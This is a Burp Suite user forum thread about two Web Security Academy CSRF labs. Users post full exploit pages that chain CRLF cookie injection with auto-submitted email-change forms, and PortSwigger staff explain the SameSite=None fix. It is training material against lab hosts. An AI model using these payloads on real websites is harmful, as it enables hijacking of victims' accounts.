Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab #5: CSRF where token is tied to non-session cookie & Lab #6: CSRF where token is duplicated in cookie issues

LeeSu | Last updated: Oct 11, 2022 05:28PM UTC

Hello, I have been working on the CSRF Labs and I'm having problem with the following labs: - Lab #5: CSRF where token is tied to non-session cookie - Lab #6: CSRF where token is duplicated in cookie issues For Lab #5, below is what I have tried. 1. Obtained the attacker's (carlos) CSRF key from the cookie header. 2. Obtained the attacker's (carlos) CSRF token from the input parameter. 3. Crafted an HTML page that does the followings: - Inject the attacker's CSRF key into the victim's (wiener) browser cookie using the HTTP Header Injection method. - Submit the email change request with the attacker's CSRF token as the "csrf" parameter value. And below is the HTML code I made: <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.getElementById('csrf-form').submit()"> </body> </html> I have also tried this: <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.forms[0].submit()"> </body> </html> And upon delivering both exploits using the exploit server, I don't get any success message for the lab and it remains unsolved. The victim's email does get changed when I submit the request with the attacker's CSRF key and token using Burp Repeater. I have followed the YouTube instruction but it still didn't get solved. When I view the exploit it says "Invalid CSRF Token". I don't understand how it can be as I have checked that I am using a fresh CSRF token and key from the attacker (carlos). For Lab #6, below is what I have tried. <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned1@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> </form> <img src="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" onerror="document.getElementById('csrf-form').submit()"> </body> </html> This also doesn't work using the exploit server, but it works when using Burp Repeater. I also have checked that the csrf token gets successfully injected into the cookie header with this input "TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" on the search function using Burp Repeater. Can you spot what is issue on my exploits? Thank you!

Michelle, PortSwigger Agent | Last updated: Oct 12, 2022 09:18AM UTC

Thanks for your message. There has been a recent change to the exploit server, so the $cookie-injection-url needs to include SameSite=None for these two labs, for example: https://<your-lab-id>/?search=test%0d%0aSet-Cookie:%20csrf=fake;%20SameSite=None We'll be updating the solutions soon.

LeeSu | Last updated: Oct 17, 2022 05:54PM UTC

Thank you for the reply, I was able to solve the labs following your instruction. Much appreciated.

BirD | Last updated: Mar 18, 2024 09:18AM UTC

I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!". For Lab #6, below is what I have tried. <html> <body> <form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Michelle, PortSwigger Agent | Last updated: Mar 18, 2024 01:29PM UTC

Hi When testing this on yourself, did you have the csrf token in the form set to your CSRF token and the csrfkey in the img src link set to fake? When you then deliver this to the victim, did you set both values to fake?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.